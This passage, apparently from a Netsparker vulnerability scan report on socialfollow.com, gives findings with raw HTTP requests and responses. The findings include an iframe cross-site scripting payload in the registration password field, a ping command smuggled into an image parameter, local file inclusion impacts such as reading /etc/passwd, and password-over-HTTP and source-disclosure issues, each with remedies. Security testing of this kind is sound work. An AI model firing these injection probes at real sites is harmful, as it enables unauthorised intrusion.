style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");document.fRegister.tPassword.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /register.php

/register.php CONFIRMED

http://www.socialfollow.com/register.php

Parameters

Parameter Type Value
cbNewsletter POST 1
cbTerms POST agree
submit POST 3
tEmail POST netsparker@example.com
tName POST Smith
tPassword POST "><iframe onload=alert(9)>
tRePassword POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Content-Length: 147
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cbNewsletter=1&cbTerms=agree&submit=3&tEmail=netsparker%40example.com&tName=Smith&tPassword=%22%3e%3ciframe+onload%3dnetsparker(9)%3e&tRePassword=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:54:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6031
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <p style="color: red;">The Password fields must match.<br /></p> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="Smith" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="netsparker@example.com" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" checked="checked" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");document.fRegister.tPassword|tRePassword.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /sitemap.php

/sitemap.php CONFIRMED

http://www.socialfollow.com/sitemap.php

Form target action

/login.php

Request

GET /sitemap.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Sitemap | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><style type="text/css">div.left ul { margin-left: 15px; list-style-type: disc; } div.left ul li { padding-bottom: 5px; }</style><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1 class="title">Sitemap</h1> <ul class="sitemaptext"><li><a href="/" title="Home">Home</a></li><li><a href="/blog/" title="Blog">Blog</a></li><li><a href="/profiles/" title="Profiles">Profiles</a></li><li><a href="/login.php" title="Login">Login</a></li><li><a href="/contact-us.php" title="Contact Us">Contact Us</a></li><li><a href="/sitemap.php" title="Sitemap">Sitemap</a></li><li>Blog</li><li style="list-style-type: none;"><ul><li>2009</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/03/" title="03">03</a></li><li><a href="/blog/2009/04/" title="04">04</a></li><li><a href="/blog/2009/06/" title="06">06</a></li><li>06</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/06/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/07/" title="07">07</a></li><li>07</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/07/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/08/" title="08">08</a></li></ul></li><li>Categories</li><li style="list-style-type: none;"><ul><li><a href="/blog/c/featured/" title="Featured">Featured</a></li><li><a href="/blog/c/future-features/" title="Future-features">Future-features</a></li><li><a href="/blog/c/new-releases/" title="New-releases">New-releases</a></li><li><a href="/blog/c/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/c/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li></ul></li><li>Featured</li><li style="list-style-type: none;"><ul><li><a href="/blog/featured/social-follow-creator-interviewed/" title="Social-follow-creator-interviewed">Social-follow-creator-interviewed</a></li><li><a href="/blog/featured/social-follow-featured-on-blogger-institute/" title="Social-follow-featured-on-blogger-institute">Social-follow-featured-on-blogger-institute</a></li><li><a href="/blog/featured/social-follow-featured-on-fine-art-of-blogging/" title="Social-follow-featured-on-fine-art-of-blogging">Social-follow-featured-on-fine-art-of-blogging</a></li><li><a href="/blog/featured/social-follow-featured-on-go2web20net/" title="Social-follow-featured-on-go2web20net">Social-follow-featured-on-go2web20net</a></li><li><a href="/blog/featured/social-follow-featured-on-killerstartups/" title="Social-follow-featured-on-killerstartups">Social-follow-featured-on-killerstartups</a></li><li><a href="/blog/featured/social-follow-featured-on-ziipa-vote-for-us/" title="Social-follow-featured-on-ziipa-vote-for-us">Social-follow-featured-on-ziipa-vote-for-us</a></li><li><a href="/blog/featured/visionwiz-blogs-about-socialfollowcom/" title="Visionwiz-blogs-about-socialfollowcom">Visionwiz-blogs-about-socialfollowcom</a></li><li><a href="/blog/featured/vote-for-social-follow-on-listio-com/" title="Vote-for-social-follow-on-listio-com">Vote-for-social-follow-on-listio-com</a></li></ul></li><li>Future Features</li><li style="list-style-type: none;"><ul><li><a href="/blog/future-features/social-follow-profile-pages-coming-soon/" title="Social-follow-profile-pages-coming-soon">Social-follow-profile-pages-coming-soon</a></li></ul></li><li>New Releases</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/server-upgrade-for-social-follow/" title="Server-upgrade-for-social-follow">Server-upgrade-for-social-follow</a></li><li><a href="/blog/new-releases/social-follow-almost-launched/" title="Social-follow-almost-launched">Social-follow-almost-launched</a></li><li><a href="/blog/new-releases/social-follow-button-user-flow/" title="Social-follow-button-user-flow">Social-follow-button-user-flow</a></li><li><a href="/blog/new-releases/social-follow-expanded/" title="Social-follow-expanded">Social-follow-expanded</a></li><li><a href="/blog/new-releases/social-follow-expands-internationally/" title="Social-follow-expands-internationally">Social-follow-expands-internationally</a></li><li><a href="/blog/new-releases/social-follow-launches/" title="Social-follow-launches">Social-follow-launches</a></li><li><a href="/blog/new-releases/social-follow-profiles-officially-launched/" title="Social-follow-profiles-officially-launched">Social-follow-profiles-officially-launched</a></li><li><a href="/blog/new-releases/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/" title="Wordpress-plugin-for-social-follow">Wordpress-plugin-for-social-follow</a></li><li>Wordpress Plugin For Social Follow</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/comment-page-1/" title="Comment-page-1">Comment-page-1</a></li></ul></li></ul></li><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/page/2/" title="2">2</a></li><li><a href="/blog/page/3/" title="3">3</a></li></ul></li><li>Social Following</li><li style="list-style-type: none;"><ul><li><a href="/blog/social-following/definition-of-social-follow/" title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/social-following/social-follow-joins-twitter/" title="Social-follow-joins-twitter">Social-follow-joins-twitter</a></li></ul></li><li>Tag</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/analytics/" title="Analytics">Analytics</a></li><li><a href="/blog/tag/blogger-institute/" title="Blogger-institute">Blogger-institute</a></li><li><a href="/blog/tag/definition-of-social-follow/" title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/tag/featured/" title="Featured">Featured</a></li><li><a href="/blog/tag/fine-art-of-blogging/" title="Fine-art-of-blogging">Fine-art-of-blogging</a></li><li><a href="/blog/tag/follow-me-button/" title="Follow-me-button">Follow-me-button</a></li><li><a href="/blog/tag/go2web20net/" title="Go2web20net">Go2web20net</a></li><li><a href="/blog/tag/interview/" title="Interview">Interview</a></li><li><a href="/blog/tag/kerry-jones/" title="Kerry-jones">Kerry-jones</a></li><li><a href="/blog/tag/killerstartupscom/" title="Killerstartupscom">Killerstartupscom</a></li><li><a href="/blog/tag/multiple-languages/" title="Multiple-languages">Multiple-languages</a></li><li><a href="/blog/tag/new-feature/" title="New-feature">New-feature</a></li><li><a href="/blog/tag/new-release/" title="New-release">New-release</a></li><li><a href="/blog/tag/plugin/" title="Plugin">Plugin</a></li><li><a href="/blog/tag/rafferty-pendery/" title="Rafferty-pendery">Rafferty-pendery</a></li><li><a href="/blog/tag/raffy-pendery/" title="Raffy-pendery">Raffy-pendery</a></li><li><a href="/blog/tag/reputation-management/" title="Reputation-management">Reputation-management</a></li><li><a href="/blog/tag/social-follow-button/" title="Social-follow-button">Social-follow-button</a></li><li><a href="/blog/tag/social-follow-featured/" title="Social-follow-featured">Social-follow-featured</a></li><li><a href="/blog/tag/social-follow-new-releases/" title="Social-follow-new-releases">Social-follow-new-releases</a></li><li><a href="/blog/tag/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/tag/social-follow-user-flow/" title="Social-follow-user-flow">Social-follow-user-flow</a></li><li><a href="/blog/tag/social-follow/" title="Social-follow">Social-follow</a></li><li>Social Follow</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/social-follow/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/tag/social-networking-profiles/" title="Social-networking-profiles">Social-networking-profiles</a></li><li><a href="/blog/tag/social-networks/" title="Social-networks">Social-networks</a></li><li><a href="/blog/tag/social-profiles/" title="Social-profiles">Social-profiles</a></li><li><a href="/blog/tag/studio98/" title="Studio98">Studio98</a></li><li><a href="/blog/tag/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/twitter-feed/" title="Twitter-feed">Twitter-feed</a></li><li><a href="/blog/tag/twitter/" title="Twitter">Twitter</a></li><li>Twitter</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/twitter/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/visionwiz/" title="Visionwiz">Visionwiz</a></li><li><a href="/blog/tag/vote-for-social-follow/" title="Vote-for-social-follow">Vote-for-social-follow</a></li><li><a href="/blog/tag/vote-for-us/" title="Vote-for-us">Vote-for-us</a></li><li><a href="/blog/tag/wordpress/" title="Wordpress">Wordpress</a></li><li><a href="/blog/tag/ziipa/" title="Ziipa">Ziipa</a></li></ul></li><li>Tweets</li><li style="list-style-type: none;"><ul><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-06-28/" title="Twitter-weekly-updates-for-2009-06-28">Twitter-weekly-updates-for-2009-06-28</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-05-6/" title="Twitter-weekly-updates-for-2009-07-05-6">Twitter-weekly-updates-for-2009-07-05-6</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/" title="Twitter-weekly-updates-for-2009-07-12-2">Twitter-weekly-updates-for-2009-07-12-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/" title="Twitter-weekly-updates-for-2009-07-12-3">Twitter-weekly-updates-for-2009-07-12-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/" title="Twitter-weekly-updates-for-2009-07-12-4">Twitter-weekly-updates-for-2009-07-12-4</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12/" title="Twitter-weekly-updates-for-2009-07-12">Twitter-weekly-updates-for-2009-07-12</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/" title="Twitter-weekly-updates-for-2009-07-19-2">Twitter-weekly-updates-for-2009-07-19-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/" title="Twitter-weekly-updates-for-2009-07-19-3">Twitter-weekly-updates-for-2009-07-19-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19/" title="Twitter-weekly-updates-for-2009-07-19">Twitter-weekly-updates-for-2009-07-19</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/" title="Twitter-weekly-updates-for-2009-07-26-2">Twitter-weekly-updates-for-2009-07-26-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26/" title="Twitter-weekly-updates-for-2009-07-26"..
[Possible] Local File Inclusion

[Possible] Local File Inclusion

1 TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depends on these factors an attacker might carry out one or more of the following attacks:
  • Gather usernames via /etc/password file
  • Harvest useful information from the log files such as "/apache/logs/error.log" or "/apache/logs/access.log"
  • Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.

Remedy

  • If it's possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
  • If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
  • Finally it's important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Identified Error Message

file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream:

Request

GET /button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
[Possible] PHP Source Code Disclosure

[Possible] PHP Source Code Disclosure

2 TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.

Impact

Depending on the source code, database connection strings, username and passwords, internal workings and business logic of application can be revealed. With such information an attacker can mount the following types of attacks:
  • Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
  • Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Where the file is not required delete it form the server, where such files are required ensure that its permissions prevent users from accessing it via the web server.
  2. Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
  3. Remove all temporary and backup files from the server.

Required skills for successful exploitation

This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application reside on.

External References

- /register.php

/register.php

http://www.socialfollow.com/register.php

Request

GET /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5817
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" 